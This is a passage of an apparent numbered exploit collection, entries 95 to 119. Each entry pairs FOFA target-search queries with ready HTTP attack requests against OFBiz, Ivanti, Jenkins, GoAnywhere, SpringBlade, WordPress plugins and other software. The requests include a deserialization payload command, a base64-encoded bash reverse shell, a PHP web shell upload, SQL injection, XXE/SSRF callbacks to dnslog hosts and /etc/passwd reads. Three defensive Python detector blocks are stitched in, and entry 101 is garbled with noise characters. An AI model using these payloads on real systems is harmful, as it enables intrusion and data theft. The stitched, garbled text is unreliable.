Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


Verify that the uploaded file is reachable (same filename as in the upload above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the ysoserial payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on the Kali box:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. ivanti policy secure-22.6命令注入9 h" S3 P" }! t; ?4 W, d  k  ~2 _3 P
CVE-2024-21887
# {5 P% |, q! GFOFA:body="welcome.cgi?p=logo"0 H3 U( J. ]  a$ \3 p0 k) K8 C
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.17 I2 \, n4 p7 l: x! x
Host: x.x.x.xx.x.x.x
1 H' k, T. ~3 I' YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- @3 T2 {5 `9 }" M
Connection: close
; E: W: K8 d. s: x5 GAccept-Encoding: gzip
" v' \* Z) h# e4 A; o8 c& j0 l0 Z2 y& n

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the following XML (an external parameter entity that resolves to the dnslog host):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


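Entries 102 and 103 both smuggle an external reference into XML that the SAML endpoint parses before any authentication: a ds:RetrievalMethod URI the server fetches (102) and a DOCTYPE with an external parameter entity (103). The following is an added example, not code from the original post or from Ivanti, showing the pre-parser check a defender can put in front of such an endpoint. The samples are constructed here from the two POC bodies above plus a benign AuthnRequest; the POST-binding SAMLRequest is assumed to be plain base64 as in entry 103 (not deflated).

```python
"""Added example (not part of the original post): flag SAML / XML-Signature input
that carries external references, the primitive behind entries 102
(CVE-2024-21893, RetrievalMethod URI fetched by the server) and 103
(CVE-2024-22024, DOCTYPE with an external parameter entity)."""
import base64
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# an ENTITY declaration with a SYSTEM/PUBLIC identifier is the XXE primitive
ENTITY_RE = re.compile(r"<!ENTITY\b[^>]*?\b(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# a RetrievalMethod whose URI is absolute (has a scheme) instead of a #fragment
RETRIEVAL_RE = re.compile(
    r"<(?:[\w.-]+:)?RetrievalMethod\b[^>]*?\bURI\s*=\s*\"([^\"]*)\"", re.IGNORECASE
)
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def decode_saml_request(value: str) -> str:
    """POST-binding SAMLRequest as in entry 103: plain base64, no deflate."""
    return base64.b64decode(value).decode("utf-8", errors="replace")


def encode_saml_request(xml: str) -> str:
    return base64.b64encode(xml.encode("utf-8")).decode("ascii")


def find_external_references(xml: str) -> list:
    """Return [(kind, detail), ...]; an empty list means nothing was flagged."""
    findings = []
    if DOCTYPE_RE.search(xml):
        findings.append(("doctype", "DTD in client-supplied XML"))
    for m in ENTITY_RE.finditer(xml):
        findings.append(("external-entity", " ".join(m.group(0).split())))
    for m in RETRIEVAL_RE.finditer(xml):
        uri = m.group(1)
        if SCHEME_RE.match(uri):
            findings.append(("retrieval-method", uri))
    return findings


def check_saml_request(b64_value: str) -> list:
    """Decode a SAMLRequest form value and run the checks on the XML inside."""
    return find_external_references(decode_saml_request(b64_value))


# Constructed samples: the first two are the bodies from entries 103 and 102.
SAMPLE_SAML_REQUEST_B64 = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNo"
    "VG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hU"
    "b3dyO10+PHI+PC9yPg=="
)
SAMPLE_SAML20_WS_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    '<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    '<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo>'
    "<ds:SignatureValue>qwerty</ds:SignatureValue>"
    '<ds:KeyInfo><ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    "<ds:Object></ds:Object></ds:Signature></soap:Body></soap:Envelope>"
)
# A benign AuthnRequest (constructed) for contrast: no DTD, no RetrievalMethod.
BENIGN_AUTHN_REQUEST = (
    '<?xml version="1.0"?><samlp:AuthnRequest '
    'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_abc123" Version="2.0" '
    'IssueInstant="2024-06-01T00:00:00Z"><saml:Issuer '
    'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://sp.example/metadata</saml:Issuer>'
    "</samlp:AuthnRequest>"
)
```

Run the check before the XML reaches the real parser and answer HTTP 400 on any finding; the parser itself should still have DTD processing and external key retrieval disabled, since the regexes here are a tripwire, not a substitute for a hardened parser configuration.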
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The two requests share the same Session value: the upload side carries the raw CLI frames (shown here as a Python bytes literal), the download side returns the command output.
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Response on the download side (lines of /etc/passwd come back inside the usage/error text):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


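The bytes literal in entry 109 is opaque until it is broken into frames. As an added example, not code from the original post or from the Jenkins project, here is a builder that produces those frames from their parts and a helper that pulls the leaked file lines back out of the response text. The opcode values (ARG=0, LOCALE=1, ENCODING=2, START=3) and the length-prefix convention are read off the POC bytes above rather than taken from Jenkins source; the sample response is constructed from the lines shown in entry 109.

```python
"""Added example (not part of the original post): build the /cli?remoting=false
upload frames used for CVE-2024-23897 and extract what leaks back."""
import re
import struct

# Opcodes as they appear in the POC bytes of entry 109.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3


def _frame(op: int, payload: bytes) -> bytes:
    """4-byte big-endian payload length, 1-byte opcode, payload.
    The POC does not count the opcode byte in the length, so neither do we."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def _java_utf(text: str) -> bytes:
    """DataOutputStream.writeUTF layout: 2-byte big-endian length, then bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def build_cli_request(args, encoding: str = "GBK", locale: str = "en_US") -> bytes:
    """Serialize CLI arguments in the order the POC sends them:
    one ARG frame per argument, then ENCODING, LOCALE and an empty START."""
    out = b"".join(_frame(OP_ARG, _java_utf(a)) for a in args)
    out += _frame(OP_ENCODING, _java_utf(encoding))
    out += _frame(OP_LOCALE, _java_utf(locale))
    out += _frame(OP_START, b"")
    return out


def file_read_probe(path: str) -> bytes:
    """`help @<path>`: the '@' makes the argument parser read the file as
    extra arguments, so its lines surface in the usage/error output."""
    return build_cli_request(["help", "@" + path])


# Where the file contents show up in the download-side response (entry 109):
# the first line becomes the default COMMAND, the rest are "Too many arguments".
LEAK_PATTERNS = (
    re.compile(r"Too many arguments: (.+)"),
    re.compile(r"\(default: (.+)\)"),
)


def extract_leaked_lines(response_text: str) -> list:
    """Return the file lines embedded in the CLI error text, in order seen."""
    found = []
    for line in response_text.splitlines():
        for rx in LEAK_PATTERNS:
            m = rx.search(line)
            if m:
                found.append(m.group(1).strip())
    return found


# Constructed sample: the download-side response shown in entry 109.
SAMPLE_RESPONSE = (
    "ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "java -jar jenkins-cli.jar help\n"
    "[COMMAND]\n"
    "Lists all the available commands or a detailed description of single command.\n"
    "COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)\n"
)
```

`file_read_probe("/etc/passwd")` reproduces the exact bytes of the upload request above, which is the check to run when writing a detection for this traffic: the signature is an ARG frame whose string starts with `@`.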
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 - 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


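The post's stated purpose is triage by defenders, and most of the POCs so far put their signature in the request line, where an access log records it. As an added example, not code from the original post or any vendor, here is a scanner that URL-decodes the request target of each log line and matches it against the primitives used by entries 95-96 (requirePasswordChange=Y), 101 and 110 (../ and ..;/ traversal), 105-107, 111, 114 and 117 (updatexml/sleep-based MySQL injection) and 113 (file:// through wp_automatic=download). It assumes Apache/nginx Combined or Common Log Format; the sample lines are constructed here from the POCs above plus one benign request, and the patterns are illustrative rather than a complete ruleset.

```python
"""Added example (not part of the original post): scan web-server access logs
for the URL-borne request signatures collected in this section."""
import re
from urllib.parse import unquote_plus

# signature name -> pattern applied to the URL-decoded request target
SIGNATURES = {
    # entries 105-107, 111, 114, 117: MySQL error/time-based injection primitives
    "sqli-mysql": re.compile(
        r"\b(?:updatexml|extractvalue|benchmark)\s*\(|\bsleep\s*\(\s*\d", re.I),
    # entries 95-96: OFBiz authentication bypass via requirePasswordChange=Y
    "ofbiz-auth-bypass": re.compile(r"/webtools/control/.*requirePasswordChange=Y", re.I),
    # entries 101 and 110: ../ or ..;/ used to reach a privileged path
    "path-traversal": re.compile(r"\.\.;?/"),
    # entry 113: file:// pulled through wp-automatic's download action
    "wp-automatic-lfi": re.compile(r"wp_automatic=download.*\blink=file:", re.I),
}

# The quoted '"METHOD target HTTP/x.y"' field of Combined/Common Log Format.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Return [(line_no, signature_name, decoded_target), ...] for every hit.
    Lines without a parseable request field are skipped, not guessed at."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # decode once so %28 / + in the exploit match the same regex as the plain form
        target = unquote_plus(m.group("target"))
        for name, rx in SIGNATURES.items():
            if rx.search(target):
                hits.append((line_no, name, target))
    return hits


# Constructed sample log: lines 1-6 are built from entries 106, 114, 101, 110,
# 96 and 113 respectively; line 7 is a benign theme asset request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2024:10:00:01 +0800] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 321',
    '10.0.0.5 - - [01/Jun/2024:10:00:02 +0800] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 88',
    '10.0.0.5 - - [01/Jun/2024:10:00:03 +0800] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 200 40',
    '10.0.0.5 - - [01/Jun/2024:10:00:04 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jun/2024:10:00:05 +0800] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jun/2024:10:00:06 +0800] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1900',
    '10.0.0.7 - - [01/Jun/2024:10:00:07 +0800] "GET /wp-content/themes/bricks/style.css HTTP/1.1" 200 7788',
]
```

Feed it a real file with `scan_access_log(open("access.log", encoding="utf-8", errors="replace"))`. The POST-body injections in this section (entries 112, 119 and the Bricks Builder request) do not show up in an access log at all; those need request-body logging or a WAF in front of the application.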
118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php (the path given in txt_path).

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
